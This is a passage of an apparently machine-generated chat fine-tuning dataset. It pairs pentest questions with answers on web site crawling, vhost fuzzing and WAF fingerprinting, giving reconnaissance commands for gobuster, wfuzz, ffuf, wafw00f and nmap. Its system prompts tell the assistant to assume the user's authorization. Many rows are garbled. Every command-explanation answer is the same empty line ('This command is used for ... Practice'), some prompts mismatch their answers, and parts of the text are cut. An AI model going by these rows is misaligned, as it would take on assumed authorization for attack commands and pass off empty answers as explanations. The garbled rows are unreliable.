hakrawler\n\necho $URL | hakrawler -d 10\n\nBurp Suite's graphical interface is a great alternative (Dashboard > New scan (Crawl) then Target).\n\nOnce the crawling is over, testers need to inspect the website architecture and look for admin paths, unusual redirections and anything that could lead to a potential vulnerability.", "metadata": {"corpus_index": 1994, "category": "web", "source_file": "docs/src/web/recon/site-crawling.md", "page_title": "Site crawling", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Site crawling - Practice?"}, {"role": "assistant", "content": "Tools like katana (Go), hakrawler (Go), scrapy (Python) and spidy (Python), and many other tools can be used for that purpose.\n\n== katana\n\nkatana -u $URL -d 10\n\n== hakrawler\n\necho $URL | hakrawler -d 10\n\nBurp Suite's graphical interface is a great alternative (Dashboard > New scan (Crawl) then Target).\n\nOnce the crawling is over, testers need to inspect the website architecture and look for admin paths, unusual redirections and anything that could lead to a potential vulnerability."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Site crawling - Practice?", "response": "Tools like katana (Go), hakrawler (Go), scrapy (Python) and spidy (Python), and many other tools can be used for that purpose.\n\n== katana\n\nkatana -u $URL -d 10\n\n== hakrawler\n\necho $URL | hakrawler -d 10\n\nBurp Suite's graphical interface is a great alternative (Dashboard > New scan (Crawl) then Target).\n\nOnce the crawling is over, testers need to inspect the website architecture and look for admin paths, unusual redirections and anything that could lead to a potential vulnerability.", "metadata": {"corpus_index": 1994, "category": "web", "source_file": "docs/src/web/recon/site-crawling.md", "page_title": "Site crawling", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Subdomain & vhost fuzzing - Theory"}, {"role": "assistant", "content": "A web server can host multiple websites for multiple domain names (websites). In order to choose what website to show for what domain, many use what is called \"virtual hosting\". Virtual hosting can be based on a name, an IP, or a port (read more). \n\nTwo main mechanisms can be used to access a website on a virtual host:\n\n* HTTP: the use of the Host request header. The client uses the ` directive to connect to the domain name of the server. Optionally, it can use the ` directive to specify a TCP port number on which the server is listening.\n* HTTPS: the use of the Server Name Indication (SNI) extension with TLS. The client indicates the hostname it wants to connect to at the start of the handshake process.\n\nWhen having a domain name as scope, operating virtual host (a.k.a. vhost) fuzzing is recommended to possibly find alternate domain names of subdomains that point to a virtual host, and thus have a better knowledge of the attack surface. This technique relies on the attacker using a dictionary/wordlist. A request is made for every line of the wordlist to differentiate pages that exist and pages that don't\n\n> [!WARNING]\n> This technique is not to be confused with DNS bruteforcing. Vhost fuzzing/bruteforcing requests are made over HTTP and rely on the virtual hosting feature that many web app profit from. DNS bruteforcing relies on domain name resolution requests made over DNS to a DNS server."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Subdomain & vhost fuzzing - Theory", "response": "A web server can host multiple websites for multiple domain names (websites). In order to choose what website to show for what domain, many use what is called \"virtual hosting\". Virtual hosting can be based on a name, an IP, or a port (read more). \n\nTwo main mechanisms can be used to access a website on a virtual host:\n\n* HTTP: the use of the Host request header. The client uses the ` directive to connect to the domain name of the server. Optionally, it can use the ` directive to specify a TCP port number on which the server is listening.\n* HTTPS: the use of the Server Name Indication (SNI) extension with TLS. The client indicates the hostname it wants to connect to at the start of the handshake process.\n\nWhen having a domain name as scope, operating virtual host (a.k.a. vhost) fuzzing is recommended to possibly find alternate domain names of subdomains that point to a virtual host, and thus have a better knowledge of the attack surface. This technique relies on the attacker using a dictionary/wordlist. A request is made for every line of the wordlist to differentiate pages that exist and pages that don't\n\n> [!WARNING]\n> This technique is not to be confused with DNS bruteforcing. Vhost fuzzing/bruteforcing requests are made over HTTP and rely on the virtual hosting feature that many web app profit from. DNS bruteforcing relies on domain name resolution requests made over DNS to a DNS server.", "metadata": {"corpus_index": 1995, "category": "web", "source_file": "docs/src/web/recon/virtual-host-fuzzing.md", "page_title": "Subdomain & vhost fuzzing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Subdomain & vhost fuzzing - Theory"}, {"role": "assistant", "content": "A web server can host multiple websites for multiple domain names (websites). In order to choose what website to show for what domain, many use what is called \"virtual hosting\". Virtual hosting can be based on a name, an IP, or a port (read more). \n\nTwo main mechanisms can be used to access a website on a virtual host:\n\n* HTTP: the use of the Host request header. The client uses the ` directive to connect to the domain name of the server. Optionally, it can use the ` directive to specify a TCP port number on which the server is listening.\n* HTTPS: the use of the Server Name Indication (SNI) extension with TLS. The client indicates the hostname it wants to connect to at the start of the handshake process.\n\nWhen having a domain name as scope, operating virtual host (a.k.a. vhost) fuzzing is recommended to possibly find alternate domain names of subdomains that point to a virtual host, and thus have a better knowledge of the attack surface. This technique relies on the attacker using a dictionary/wordlist. A request is made for every line of the wordlist to differentiate pages that exist and pages that don't\n\n> [!WARNING]\n> This technique is not to be confused with DNS bruteforcing. Vhost fuzzing/bruteforcing requests are made over HTTP and rely on the virtual hosting feature that many web app profit from. DNS bruteforcing relies on domain name resolution requests made over DNS to a DNS server."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Subdomain & vhost fuzzing - Theory", "response": "A web server can host multiple websites for multiple domain names (websites). In order to choose what website to show for what domain, many use what is called \"virtual hosting\". Virtual hosting can be based on a name, an IP, or a port (read more). \n\nTwo main mechanisms can be used to access a website on a virtual host:\n\n* HTTP: the use of the Host request header. The client uses the ` directive to connect to the domain name of the server. Optionally, it can use the ` directive to specify a TCP port number on which the server is listening.\n* HTTPS: the use of the Server Name Indication (SNI) extension with TLS. The client indicates the hostname it wants to connect to at the start of the handshake process.\n\nWhen having a domain name as scope, operating virtual host (a.k.a. vhost) fuzzing is recommended to possibly find alternate domain names of subdomains that point to a virtual host, and thus have a better knowledge of the attack surface. This technique relies on the attacker using a dictionary/wordlist. A request is made for every line of the wordlist to differentiate pages that exist and pages that don't\n\n> [!WARNING]\n> This technique is not to be confused with DNS bruteforcing. Vhost fuzzing/bruteforcing requests are made over HTTP and rely on the virtual hosting feature that many web app profit from. DNS bruteforcing relies on domain name resolution requests made over DNS to a DNS server.", "metadata": {"corpus_index": 1995, "category": "web", "source_file": "docs/src/web/recon/virtual-host-fuzzing.md", "page_title": "Subdomain & vhost fuzzing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Subdomain & vhost fuzzing - Practice?"}, {"role": "assistant", "content": "Tools like gobuster (Go), wfuzz (Python) and ffuf (Go) can do vhost fuzzing/bruteforcing. Burp Suite can do it too. Depending on the web application, one will be better suited than another and additional options will be needed.\n\nVhost fuzzing needs to be slowed down when testing production instances as it could lead to an unintended denial of service.\n\n``bash\ngobuster vhost --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL\n`\n\n`bash\nwfuzz -H \"Host: FUZZ.something.com\" --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL\n`\n\n`bash\nffuf -H \"Host: FUZZ.$DOMAIN\" -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -u $URL\n`\n\nSome applications don't allow vhost fuzzing like showcased above. The command below can be attempted.\n\n`bash\nffuf -c -r -w \"/path/to/wordlist.txt\" -u \"http://FUZZ.$TARGET/\"\n``\n\n> [!TIP]\n> Virtual host fuzzing is not the only technique to find subdomains. There are others means to that end: see subdomains enumeration."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Subdomain & vhost fuzzing - Practice?", "response": "Tools like gobuster (Go), wfuzz (Python) and ffuf (Go) can do vhost fuzzing/bruteforcing. Burp Suite can do it too. Depending on the web application, one will be better suited than another and additional options will be needed.\n\nVhost fuzzing needs to be slowed down when testing production instances as it could lead to an unintended denial of service.\n\n``bash\ngobuster vhost --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL\n`\n\n`bash\nwfuzz -H \"Host: FUZZ.something.com\" --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL\n`\n\n`bash\nffuf -H \"Host: FUZZ.$DOMAIN\" -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -u $URL\n`\n\nSome applications don't allow vhost fuzzing like showcased above. The command below can be attempted.\n\n`bash\nffuf -c -r -w \"/path/to/wordlist.txt\" -u \"http://FUZZ.$TARGET/\"\n``\n\n> [!TIP]\n> Virtual host fuzzing is not the only technique to find subdomains. There are others means to that end: see subdomains enumeration.", "metadata": {"corpus_index": 1996, "category": "web", "source_file": "docs/src/web/recon/virtual-host-fuzzing.md", "page_title": "Subdomain & vhost fuzzing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Subdomain & vhost fuzzing - Practice"}, {"role": "assistant", "content": "Tools like gobuster (Go), wfuzz (Python) and ffuf (Go) can do vhost fuzzing/bruteforcing. Burp Suite can do it too. Depending on the web application, one will be better suited than another and additional options will be needed.\n\nVhost fuzzing needs to be slowed down when testing production instances as it could lead to an unintended denial of service.\n\n``bash\ngobuster vhost --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL\n`\n\n`bash\nwfuzz -H \"Host: FUZZ.something.com\" --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL\n`\n\n`bash\nffuf -H \"Host: FUZZ.$DOMAIN\" -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -u $URL\n`\n\nSome applications don't allow vhost fuzzing like showcased above. The command below can be attempted.\n\n`bash\nffuf -c -r -w \"/path/to/wordlist.txt\" -u \"http://FUZZ.$TARGET/\"\n``\n\n> [!TIP]\n> Virtual host fuzzing is not the only technique to find subdomains. There are others means to that end: see subdomains enumeration."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Subdomain & vhost fuzzing - Practice", "response": "Tools like gobuster (Go), wfuzz (Python) and ffuf (Go) can do vhost fuzzing/bruteforcing. Burp Suite can do it too. Depending on the web application, one will be better suited than another and additional options will be needed.\n\nVhost fuzzing needs to be slowed down when testing production instances as it could lead to an unintended denial of service.\n\n``bash\ngobuster vhost --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL\n`\n\n`bash\nwfuzz -H \"Host: FUZZ.something.com\" --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL\n`\n\n`bash\nffuf -H \"Host: FUZZ.$DOMAIN\" -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -u $URL\n`\n\nSome applications don't allow vhost fuzzing like showcased above. The command below can be attempted.\n\n`bash\nffuf -c -r -w \"/path/to/wordlist.txt\" -u \"http://FUZZ.$TARGET/\"\n``\n\n> [!TIP]\n> Virtual host fuzzing is not the only technique to find subdomains. There are others means to that end: see subdomains enumeration.", "metadata": {"corpus_index": 1996, "category": "web", "source_file": "docs/src/web/recon/virtual-host-fuzzing.md", "page_title": "Subdomain & vhost fuzzing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the gobuster syntax for subdomain & vhost fuzzing - practice?"}, {"role": "assistant", "content": "gobuster vhost --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the gobuster syntax for subdomain & vhost fuzzing - practice?", "response": "gobuster vhost --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL", "metadata": {"corpus_index": 1997, "category": "web", "source_file": "docs/src/web/recon/virtual-host-fuzzing.md", "page_title": "Subdomain & vhost fuzzing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "gobuster"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Subdomain & vhost fuzzing - Practice"}, {"role": "assistant", "content": "gobuster vhost --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Subdomain & vhost fuzzing - Practice", "response": "gobuster vhost --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL", "metadata": {"corpus_index": 1997, "category": "web", "source_file": "docs/src/web/recon/virtual-host-fuzzing.md", "page_title": "Subdomain & vhost fuzzing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `gobuster vhost --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL`?"}, {"role": "assistant", "content": "This command is used for subdomain & vhost fuzzing - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `gobuster vhost --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL`?", "response": "This command is used for subdomain & vhost fuzzing - practice. Practice", "metadata": {"corpus_index": 1997, "category": "web", "source_file": "docs/src/web/recon/virtual-host-fuzzing.md", "page_title": "Subdomain & vhost fuzzing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the wfuzz command to subdomain & vhost fuzzing - practice"}, {"role": "assistant", "content": "wfuzz -H \"Host: FUZZ.something.com\" --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the wfuzz command to subdomain & vhost fuzzing - practice", "response": "wfuzz -H \"Host: FUZZ.something.com\" --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL", "metadata": {"corpus_index": 1998, "category": "web", "source_file": "docs/src/web/recon/virtual-host-fuzzing.md", "page_title": "Subdomain & vhost fuzzing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "wfuzz"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Subdomain & vhost fuzzing - Practice"}, {"role": "assistant", "content": "wfuzz -H \"Host: FUZZ.something.com\" --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Subdomain & vhost fuzzing - Practice", "response": "wfuzz -H \"Host: FUZZ.something.com\" --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL", "metadata": {"corpus_index": 1998, "category": "web", "source_file": "docs/src/web/recon/virtual-host-fuzzing.md", "page_title": "Subdomain & vhost fuzzing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `wfuzz -H \"Host: FUZZ.something.com\" --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL`?"}, {"role": "assistant", "content": "This command is used for subdomain & vhost fuzzing - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `wfuzz -H \"Host: FUZZ.something.com\" --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL`?", "response": "This command is used for subdomain & vhost fuzzing - practice. Practice", "metadata": {"corpus_index": 1998, "category": "web", "source_file": "docs/src/web/recon/virtual-host-fuzzing.md", "page_title": "Subdomain & vhost fuzzing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the ffuf command to subdomain & vhost fuzzing - practice"}, {"role": "assistant", "content": "ffuf -H \"Host: FUZZ.$DOMAIN\" -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -u $URL"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the ffuf command to subdomain & vhost fuzzing - practice", "response": "ffuf -H \"Host: FUZZ.$DOMAIN\" -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -u $URL", "metadata": {"corpus_index": 1999, "category": "web", "source_file": "docs/src/web/recon/virtual-host-fuzzing.md", "page_title": "Subdomain & vhost fuzzing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ffuf"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Subdomain & vhost fuzzing - Practice"}, {"role": "assistant", "content": "ffuf -H \"Host: FUZZ.$DOMAIN\" -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -u $URL"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Subdomain & vhost fuzzing - Practice", "response": "ffuf -H \"Host: FUZZ.$DOMAIN\" -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -u $URL", "metadata": {"corpus_index": 1999, "category": "web", "source_file": "docs/src/web/recon/virtual-host-fuzzing.md", "page_title": "Subdomain & vhost fuzzing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ffuf -H \"Host: FUZZ.$DOMAIN\" -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -u $URL`?"}, {"role": "assistant", "content": "This command is used for subdomain & vhost fuzzing - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ffuf -H \"Host: FUZZ.$DOMAIN\" -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -u $URL`?", "response": "This command is used for subdomain & vhost fuzzing - practice. Practice", "metadata": {"corpus_index": 1999, "category": "web", "source_file": "docs/src/web/recon/virtual-host-fuzzing.md", "page_title": "Subdomain & vhost fuzzing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the ffuf command for subdomain & vhost fuzzing - practice"}, {"role": "assistant", "content": "ffuf -c -r -w \"/path/to/wordlist.txt\" -u \"http://FUZZ.$TARGET/\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the ffuf command for subdomain & vhost fuzzing - practice", "response": "ffuf -c -r -w \"/path/to/wordlist.txt\" -u \"http://FUZZ.$TARGET/\"", "metadata": {"corpus_index": 2000, "category": "web", "source_file": "docs/src/web/recon/virtual-host-fuzzing.md", "page_title": "Subdomain & vhost fuzzing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ffuf"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Subdomain & vhost fuzzing - Practice during a pentest?"}, {"role": "assistant", "content": "ffuf -c -r -w \"/path/to/wordlist.txt\" -u \"http://FUZZ.$TARGET/\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Subdomain & vhost fuzzing - Practice during a pentest?", "response": "ffuf -c -r -w \"/path/to/wordlist.txt\" -u \"http://FUZZ.$TARGET/\"", "metadata": {"corpus_index": 2000, "category": "web", "source_file": "docs/src/web/recon/virtual-host-fuzzing.md", "page_title": "Subdomain & vhost fuzzing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ffuf -c -r -w \"/path/to/wordlist.txt\" -u \"http://FUZZ.$TARGET/\"`?"}, {"role": "assistant", "content": "This command is used for subdomain & vhost fuzzing - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ffuf -c -r -w \"/path/to/wordlist.txt\" -u \"http://FUZZ.$TARGET/\"`?", "response": "This command is used for subdomain & vhost fuzzing - practice. Practice", "metadata": {"corpus_index": 2000, "category": "web", "source_file": "docs/src/web/recon/virtual-host-fuzzing.md", "page_title": "Subdomain & vhost fuzzing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Web Application Firewall (WAF) - Theory work?"}, {"role": "assistant", "content": "Many web applications stand behind a WAF (Web Application Firewall) that aim the protecting app from different types of attacks (XSS, SQLi, etc.) by monitoring and filtering requests. Identifying if a WAF is used, and if so what type it is, can help bypass known filters."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Web Application Firewall (WAF) - Theory work?", "response": "Many web applications stand behind a WAF (Web Application Firewall) that aim the protecting app from different types of attacks (XSS, SQLi, etc.) by monitoring and filtering requests. Identifying if a WAF is used, and if so what type it is, can help bypass known filters.", "metadata": {"corpus_index": 2001, "category": "web", "source_file": "docs/src/web/recon/waf-fingerprinting.md", "page_title": "Web Application Firewall (WAF)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Web Application Firewall (WAF) - Theory"}, {"role": "assistant", "content": "Many web applications stand behind a WAF (Web Application Firewall) that aim the protecting app from different types of attacks (XSS, SQLi, etc.) by monitoring and filtering requests. Identifying if a WAF is used, and if so what type it is, can help bypass known filters."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Web Application Firewall (WAF) - Theory", "response": "Many web applications stand behind a WAF (Web Application Firewall) that aim the protecting app from different types of attacks (XSS, SQLi, etc.) by monitoring and filtering requests. Identifying if a WAF is used, and if so what type it is, can help bypass known filters.", "metadata": {"corpus_index": 2001, "category": "web", "source_file": "docs/src/web/recon/waf-fingerprinting.md", "page_title": "Web Application Firewall (WAF)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Web Application Firewall (WAF) - Practice?"}, {"role": "assistant", "content": "This can be done with tools like WAFW00F (Python), WhatWaf (Python) or nmap or sometimes by manually looking at cookies and HTTP response headers.\n\n``bash\nwafw00f $URL\nwhatwaf -u $URL\nnmap -p $PORT --script=http-waf-fingerprint,http-waf-detect $URL\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Web Application Firewall (WAF) - Practice?", "response": "This can be done with tools like WAFW00F (Python), WhatWaf (Python) or nmap or sometimes by manually looking at cookies and HTTP response headers.\n\n``bash\nwafw00f $URL\nwhatwaf -u $URL\nnmap -p $PORT --script=http-waf-fingerprint,http-waf-detect $URL\n``", "metadata": {"corpus_index": 2002, "category": "web", "source_file": "docs/src/web/recon/waf-fingerprinting.md", "page_title": "Web Application Firewall (WAF)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Web Application Firewall (WAF) - Practice"}, {"role": "assistant", "content": "This can be done with tools like WAFW00F (Python), WhatWaf (Python) or nmap or sometimes by manually looking at cookies and HTTP response headers.\n\n``bash\nwafw00f $URL\nwhatwaf -u $URL\nnmap -p $PORT --script=http-waf-fingerprint,http-waf-detect $URL\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Web Application Firewall (WAF) - Practice", "response": "This can be done with tools like WAFW00F (Python), WhatWaf (Python) or nmap or sometimes by manually looking at cookies and HTTP response headers.\n\n``bash\nwafw00f $URL\nwhatwaf -u $URL\nnmap -p $PORT --script=http-waf-fingerprint,http-waf-detect $URL\n``", "metadata": {"corpus_index": 2002, "category": "web", "source_file": "docs/src/web/recon/waf-fingerprinting.md", "page_title": "Web Application Firewall (WAF)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use wafw00f for web application firewall (waf) - practice?"}, {"role": "assistant", "content": "wafw00f $URL\nwhatwaf -u $URL\nnmap -p $PORT --script=http-waf-fingerprint,http-waf-detect $URL"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use wafw00f for web application firewall (waf) - practice?", "response": "wafw00f $URL\nwhatwaf -u $URL\nnmap -p $PORT --script=http-waf-fingerprint,http-waf-detect $URL", "metadata": {"corpus_index": 2003, "category": "web", "source_file": "docs/src/web/recon/waf-fingerprinting.md", "page_title": "Web Application Firewall (WAF)", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "wafw00f"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Web Application Firewall (WAF) - Practice"}, {"role": "assistant", "content": "wafw00f $URL\nwhatwaf -u $URL\nnmap -p $PORT 